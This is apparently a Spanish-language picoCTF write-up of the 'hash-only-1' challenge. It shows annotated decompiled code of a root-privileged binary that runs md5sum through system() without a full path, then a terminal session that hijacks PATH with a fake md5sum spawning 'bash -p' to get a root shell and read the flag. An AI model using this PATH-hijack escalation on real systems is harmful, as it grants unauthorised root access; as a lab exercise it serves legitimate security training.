hash-only-1

pico
pwn

August 8, 2025 · 2 minutes

// Decompiler output (Ghidra-style annotations) for the challenge binary's
// entry point. The `bool` return type, the `allocator` temporaries and the
// `try { ... }` comments are artifacts of the decompiler, not of the original
// source; do not read them as intentional design.
//
// Observable behaviour, top to bottom:
//   1. Print a banner to stdout, then sleep(2).
//   2. Build the std::string "/bin/bash -c 'md5sum /root/flag.txt'".
//   3. setgid(0); setuid(0);  -- return values are not checked.
//   4. system() that string. Nothing in this function touches the
//      environment (no clearenv/setenv/putenv visible), so the child
//      `bash -c` inherits the caller's PATH and resolves the unqualified
//      `md5sum` through it. That is the PATH-hijack the writeup exploits:
//      a user-controlled PATH entry placed before /usr/bin runs as uid 0.
//   5. Return true (non-zero exit) only when system() reported a non-zero
//      status; on success the function returns false (exit status 0).
bool main(void)

{
  basic_ostream *pbVar1;
  basic_ostream<> *pbVar2;
  char *__command;
  long in_FS_OFFSET;
  bool bVar3;
  allocator<char> local_4d;
  int local_4c;
  basic_string<> local_48 [40];
  long local_20;
  
  // Stack-protector canary: loaded here, re-checked before return.
  local_20 = *(long *)(in_FS_OFFSET + 0x28);
  pbVar1 = std::operator<<((basic_ostream *)std::cout,
                           "Computing the MD5 hash of /root/flag.txt.... ");
  pbVar2 = (basic_ostream<> *)
           std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar1,std::endl<>);
  std::basic_ostream<>::operator<<(pbVar2,std::endl<>);
  sleep(2);
  std::allocator<char>::allocator();
                    /* try { // try from 001013aa to 001013ae has its CatchHandler @ 0010144f */
  // The command line: `md5sum` has no absolute path, so the child shell
  // looks it up via the (inherited, attacker-controllable) PATH.
  std::__cxx11::basic_string<>::basic_string
            ((char *)local_48,(allocator *)"/bin/bash -c \'md5sum /root/flag.txt\'");
  std::allocator<char>::~allocator(&local_4d);
  // Privilege escalation happens here, before the untrusted PATH lookup.
  // Both calls are unchecked; presumably the binary is installed SUID/SGID
  // root for them to succeed (not provable from this listing alone).
  setgid(0);
  setuid(0);
  __command = (char *)std::__cxx11::basic_string<>::c_str();
                    /* try { // try from 001013de to 00101423 has its CatchHandler @ 0010146d */
  // system() spawns /bin/sh -c with the current environment unchanged.
  local_4c = system(__command);
  // bVar3 == true means "system() failed" and doubles as the exit status.
  bVar3 = local_4c != 0;
  if (bVar3) {
    pbVar1 = std::operator<<((basic_ostream *)std::cerr,
                             "Error: system() call returned non-zero value: ");
    pbVar2 = (basic_ostream<> *)std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar1,local_4c)
    ;
    std::basic_ostream<>::operator<<(pbVar2,std::endl<>);
  }
  std::__cxx11::basic_string<>::~basic_string(local_48);
  // Canary intact -> normal return; otherwise abort via __stack_chk_fail.
  if (local_20 == *(long *)(in_FS_OFFSET + 0x28)) {
    return bVar3;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

En el programa hay un momento en el que se ejecuta un comando del sistema mediante `system()`:

            ((char *)local_48,(allocator *)"/bin/bash -c \'md5sum /root/flag.txt\'");

Está ejecutando `md5sum` sin indicar la ruta completa, y además lo hace a través de `system()` justo después de `setgid(0)`/`setuid(0)`, sin limpiar el entorno heredado. Esto es peligroso: el `bash -c` hijo resuelve `md5sum` usando el `PATH` que controla el usuario, así que basta con anteponer un directorio propio al `PATH` para que, en vez de ejecutar `/usr/bin/md5sum`, se ejecute otro `md5sum` malicioso desde otra ruta, ya con privilegios de root. Si no sabes lo que es el PATH hijacking, puedes buscarlo en el buscador de la web y consultar writeups de máquinas que toquen este tema.

ctf-player@pico-chall$ echo "/bin/bash -p" > md5sum
ctf-player@pico-chall$ chmod +x md5sum
ctf-player@pico-chall$ export PATH=$(pwd):$PATH
ctf-player@pico-chall$ flaghasher
Computing the MD5 hash of /root/flag.txt....

root@challenge:~# cat flag.txt
cat: flag.txt: No such file or directory
root@challenge:~# ls
flaghasher  md5sum
root@challenge:~# cat /root/flag.txt
picoCTF{sy5teM_********_5c@red_0f_yoU_54094e3e}